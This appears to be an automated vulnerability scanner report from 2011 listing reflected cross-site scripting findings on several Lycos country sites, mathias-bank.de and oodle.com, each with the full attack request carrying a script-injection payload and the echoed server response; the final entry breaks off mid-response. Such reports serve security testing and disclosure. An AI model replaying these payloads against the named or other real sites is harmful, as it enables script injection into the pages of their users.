The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52607"><script>alert(1)</script>d9c3a2d1f33 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags52607"><script>alert(1)</script>d9c3a2d1f33&utm_medium=footer HTTP/1.1 Host: www.lycos.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:53:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags52607"><script>alert(1)</script>d9c3a2d1f33&utm_medium=footer&diktfc=452C123F398626617D6C4C89C7F7B125B5981411BD1E&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c43"><script>alert(1)</script>dc80edb2b3d was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer78c43"><script>alert(1)</script>dc80edb2b3d HTTP/1.1 Host: www.lycos.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839810356; path=/ Date: Mon, 07 Feb 2011 14:53:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer78c43"><script>alert(1)</script>dc80edb2b3d&diktfc=F1C229FB8C4D61B53E1616164FF7F9BE4D425DA7C154&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35291"><script>alert(1)</script>653fbfc2f was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome35291"><script>alert(1)</script>653fbfc2f&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Mon, 07 Feb 2011 14:53:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14292
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome35291"><script>alert(1)</script>653fbfc2f&utm_campaign=home_flags&utm_medium=footer&diktfc=C3156FFBDBB4D022A7DBF13CFBC0383BC2CA7264744E&mobile=1"> ...[SNIP]...
1.387. http://www.lycos.it/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.it
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d800"><script>alert(1)</script>4bdcb17a0dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?7d800"><script>alert(1)</script>4bdcb17a0dc=1 HTTP/1.1 Host: www.lycos.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161725775; path=/ Date: Mon, 07 Feb 2011 14:52:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="it"> <head> <title>Lycos</ ...[SNIP]... <a href="/?7d800"><script>alert(1)</script>4bdcb17a0dc=1&diktfc=30EFC4634D2753BF85E2CDA69B3728E026D1A3C8EA87&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc8e4"><script>alert(1)</script>87b5e6593c was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsdc8e4"><script>alert(1)</script>87b5e6593c&utm_medium=footer HTTP/1.1 Host: www.lycos.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839808178; path=/ Date: Mon, 07 Feb 2011 14:53:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="it"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsdc8e4"><script>alert(1)</script>87b5e6593c&utm_medium=footer&diktfc=2637A3772BC309388E4E304B25B6327B9B46554C49D9&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd4b"><script>alert(1)</script>e79c4900847 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5cd4b"><script>alert(1)</script>e79c4900847 HTTP/1.1 Host: www.lycos.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839808178; path=/ Date: Mon, 07 Feb 2011 14:53:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="it"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5cd4b"><script>alert(1)</script>e79c4900847&diktfc=827134FE772B7DF63E2E126771D77350BBBA3C6B26CA&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee564"><script>alert(1)</script>8a7f1e9839b was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomeee564"><script>alert(1)</script>8a7f1e9839b&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3977165758; path=/ Date: Mon, 07 Feb 2011 14:53:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="it"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomeee564"><script>alert(1)</script>8a7f1e9839b&utm_campaign=home_flags&utm_medium=footer&diktfc=60B9FBE0914A609577730D1E18B513116B1E0F91AA76&mobile=1"> ...[SNIP]...
1.391. http://www.lycos.nl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.nl
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57baf"><script>alert(1)</script>6d32d0377cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?57baf"><script>alert(1)</script>6d32d0377cc=1 HTTP/1.1 Host: www.lycos.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:52:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?57baf"><script>alert(1)</script>6d32d0377cc=1&diktfc=1648FA90C23A3EF52EB50CAC59AF67FE416779CBB142&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc428"><script>alert(1)</script>eb239f71660 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsdc428"><script>alert(1)</script>eb239f71660&utm_medium=footer HTTP/1.1 Host: www.lycos.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839808178; path=/ Date: Mon, 07 Feb 2011 14:53:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagsdc428"><script>alert(1)</script>eb239f71660&utm_medium=footer&diktfc=BF834DFA03270B9EBBB1D71C9B905E429543CD4F4218&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a811"><script>alert(1)</script>9bf56e6a0b was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer8a811"><script>alert(1)</script>9bf56e6a0b HTTP/1.1 Host: www.lycos.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:53:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer8a811"><script>alert(1)</script>9bf56e6a0b&diktfc=8AC223BAE6FEEA13177171EC42C93A6EA9AE2A3F7094&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e386"><script>alert(1)</script>deadcd3a79c was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome1e386"><script>alert(1)</script>deadcd3a79c&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="nl"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome1e386"><script>alert(1)</script>deadcd3a79c&utm_campaign=home_flags&utm_medium=footer&diktfc=2B5E51E9EC7DBDEBB3E4C1CD33B7CD5A60D09E8B7D3E&mobile=1"> ...[SNIP]...
1.395. http://www.lycos.se/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.se
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbcb"><script>alert(1)</script>e8d986c549a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?cbbcb"><script>alert(1)</script>e8d986c549a=1 HTTP/1.1 Host: www.lycos.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839836492; path=/ Date: Mon, 07 Feb 2011 14:52:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="sv"> <head> <title>Lycos</ ...[SNIP]... <a href="/?cbbcb"><script>alert(1)</script>e8d986c549a=1&diktfc=1E962B350C8208992C31F4817C700148243EE601035D&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25966"><script>alert(1)</script>b8d5a74c009 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags25966"><script>alert(1)</script>b8d5a74c009&utm_medium=footer HTTP/1.1 Host: www.lycos.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839802733; path=/ Date: Mon, 07 Feb 2011 14:53:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:03 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="sv"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags25966"><script>alert(1)</script>b8d5a74c009&utm_medium=footer&diktfc=C1B0EC5676AF3DD4147C6EA0CF04A81301512661017E&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c35"><script>alert(1)</script>21072c9ee48 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd3c35"><script>alert(1)</script>21072c9ee48 HTTP/1.1 Host: www.lycos.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Mon, 07 Feb 2011 14:53:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:04 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="sv"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerd3c35"><script>alert(1)</script>21072c9ee48&diktfc=C51EF93158B2398EC42D6708D1C80B47BE30BF7033A0&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a98c4"><script>alert(1)</script>b578de5fc24 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomea98c4"><script>alert(1)</script>b578de5fc24&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:53:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:53:02 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="sv"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomea98c4"><script>alert(1)</script>b578de5fc24&utm_campaign=home_flags&utm_medium=footer&diktfc=DCA4122F5D5C1DFE2D301B758D625BF8E846C3160090&mobile=1"> ...[SNIP]...
1.399. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mathias-bank.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e8e6"><script>alert(1)</script>4f6bde8ae3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e8e6\"><script>alert(1)</script>4f6bde8ae3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2e8e6"><script>alert(1)</script>4f6bde8ae3c=1 HTTP/1.1 Host: www.mathias-bank.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:53:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Pingback: http://www.mathias-bank.de/xmlrpc.php Set-Cookie: bb2_screener_=1297090391+173.193.214.243; path=/ Set-Cookie: PHPSESSID=95d40bf2d77b155e990df934633040ca; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55143
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <form enctype="multipart/form-data" action="/?2e8e6\"><script>alert(1)</script>4f6bde8ae3c=1#usermessagea" method="post" class="cform" id="cformsform"> ...[SNIP]...
1.400. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb969"><script>alert(1)</script>4786b2ca3c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?cb969"><script>alert(1)</script>4786b2ca3c6=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Mon, 07 Feb 2011 14:53:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: otu=034c05da3267a57fec76e397ce04c5dd; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=a93c95221ac0872870e0dbbc322b92a0; path=/; domain=.oodle.com Set-Cookie: a=dT1GQ0UwOEU5NDRENTAwNzUz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzA5MDM4Nzt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 60567
